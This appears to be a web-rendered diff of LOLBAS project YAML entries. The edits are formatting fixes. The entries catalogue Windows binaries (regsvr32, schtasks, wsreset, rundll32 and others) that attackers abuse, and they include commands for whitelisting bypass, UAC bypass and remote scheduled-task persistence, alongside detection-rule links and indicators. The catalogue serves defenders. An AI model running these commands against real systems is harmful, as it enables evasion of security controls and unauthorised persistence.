|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -36,7 +36,7 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\regsvr32.exe | ||||
|   - Path: C:\Windows\SysWOW64\regsvr32.exe | ||||
| Code_Sample: | ||||
|  - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml | ||||
| @@ -57,4 +57,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -32,4 +32,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: elceef | ||||
|     Handle: '@elceef' | ||||
| --- | ||||
|   | ||||
| @@ -39,4 +39,3 @@ Acknowledgement: | ||||
|     Handle: '@splinter_code' | ||||
|   - Person: ap | ||||
|     Handle: '@decoder_it' | ||||
| --- | ||||
|   | ||||
| @@ -91,4 +91,3 @@ Acknowledgement: | ||||
|     Handle: '@404death' | ||||
|   - Person: Martin Ingesen | ||||
|     Handle: '@Mrtn9' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Runonce.exe | ||||
| Description: | ||||
| Description: Executes a Run Once Task that has been configured in the registry | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -27,4 +27,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Runscripthelper.exe | ||||
| Description: | ||||
| Description: Execute target PowerShell script | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -18,7 +18,7 @@ Code_Sample: | ||||
|   - Code: | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules  | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - IOC: Event 4014 - Powershell logging | ||||
|   - IOC: Event 400 | ||||
| Resources: | ||||
| @@ -26,4 +26,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
| --- | ||||
|   | ||||
| @@ -36,4 +36,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -11,7 +11,7 @@ Commands: | ||||
|     Privileges: User | ||||
|     MitreID: T1053.005 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily  | ||||
|   - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily | ||||
|     Description: Create a scheduled task on a remote computer for persistence/lateral movement | ||||
|     Usecase: Create a remote task to run daily relative to the the time of creation | ||||
|     Category: Execute | ||||
| @@ -33,4 +33,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Scriptrunner.exe | ||||
| Description: | ||||
| Description: Execute binary through proxy binary to evade defensive counter measures | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -33,4 +33,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Nick Tyrer | ||||
|     Handle: '@nicktyrer' | ||||
| --- | ||||
|   | ||||
| @@ -31,4 +31,3 @@ Acknowledgement: | ||||
|     Handle: '@hexacorn' | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -22,4 +22,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Eral4m | ||||
|     Handle: '@eral4m' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Nick Landers | ||||
|     Handle: '@monoxgas' | ||||
| --- | ||||
|   | ||||
| @@ -35,4 +35,3 @@ Acknowledgement: | ||||
|     Handle: '@oddvarmoe' | ||||
|   - Person: Maxime Nadeau | ||||
|     Handle: '@m_nad0' | ||||
| --- | ||||
|   | ||||
| @@ -37,4 +37,3 @@ Acknowledgement: | ||||
|     Handle: '@oulusoyum' | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
| --- | ||||
|   | ||||
| @@ -22,13 +22,12 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe | ||||
| Code_Sample: | ||||
|    - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|    - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml | ||||
|    - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml | ||||
| Acknowledgement: | ||||
|   - Person: Lior Adar | ||||
|     Handle: | ||||
|   - Person: Hai Vaknin(Lux) | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Verclsid.exe | ||||
| Description: | ||||
| Description: Used to verify a COM object before it is instantiated by Windows Explorer | ||||
| Author: '@bohops' | ||||
| Created: 2018-12-04 | ||||
| Commands: | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Nick Tyrer | ||||
|     Handle: '@NickTyrer' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@Hexacorn' | ||||
| --- | ||||
|   | ||||
| @@ -30,4 +30,3 @@ Acknowledgement: | ||||
|     Handle: '@Oddvarmoe' | ||||
|   - Person: Freddy | ||||
|     Handle: '@falsneg' | ||||
| --- | ||||
|   | ||||
| @@ -88,4 +88,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Acknowledgement: | ||||
|     Handle: '@YoSignals' | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -31,7 +31,7 @@ Detection: | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|   - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules  | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - IOC: Wscript.exe executing code from alternate data streams | ||||
|   - IOC: DotNet CLR libraries loaded into wscript.exe | ||||
|   - IOC: DotNet CLR Usage Log - wscript.exe.log | ||||
| @@ -42,4 +42,3 @@ Acknowledgement: | ||||
|     Handle: '@oddvarmoe' | ||||
|   - Person: SaiLay(valen) | ||||
|     Handle: '@404death' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: wsreset.exe | ||||
|     Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. | ||||
|     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. | ||||
|     Category: UAC bypass | ||||
|     Category: UAC Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows 10 | ||||
| @@ -31,4 +31,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Hashim Jawad | ||||
|     Handle: '@ihack4falafel' | ||||
| --- | ||||
|   | ||||
| @@ -18,7 +18,7 @@ Code_Sample: | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_wuauclt_network_connection.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/f16aca7a353bb01d9862ea1f2a10fa0d866e83c3/rules/windows/process_creation/sysmon_proxy_execution_wuauclt.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml  | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml | ||||
|   - IOC: wuauclt run with a parameter of a DLL path | ||||
|   - IOC: Suspicious wuauclt Internet/network connections | ||||
| Resources: | ||||
| @@ -26,4 +26,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: David Middlehurst | ||||
|     Handle: '@dtmsecurity' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Xwizard.exe | ||||
| Description: | ||||
| Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -50,4 +50,3 @@ Acknowledgement: | ||||
|     Handle: '@harr0ey' | ||||
|   - Person: Wade Hickey | ||||
|     Handle: '@notwhickey' | ||||
| --- | ||||
|   | ||||
| @@ -1,7 +1,7 @@ | ||||
| --- | ||||
| Name: Advpack.dll | ||||
| Description: Utility for installing software and drivers with rundll32.exe | ||||
| Author: | ||||
| Author: LOLBAS Team | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
|   - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, | ||||
| @@ -62,4 +62,3 @@ Acknowledgement: | ||||
|     Handle: '@moriarty_meng' | ||||
|   - Person: Nick Carr (Threat Intel) | ||||
|     Handle: '@ItsReallyNick' | ||||
| --- | ||||
|   | ||||
Some files were not shown because too many files have changed in this diff Show More
		Reference in New Issue
	
	Block a user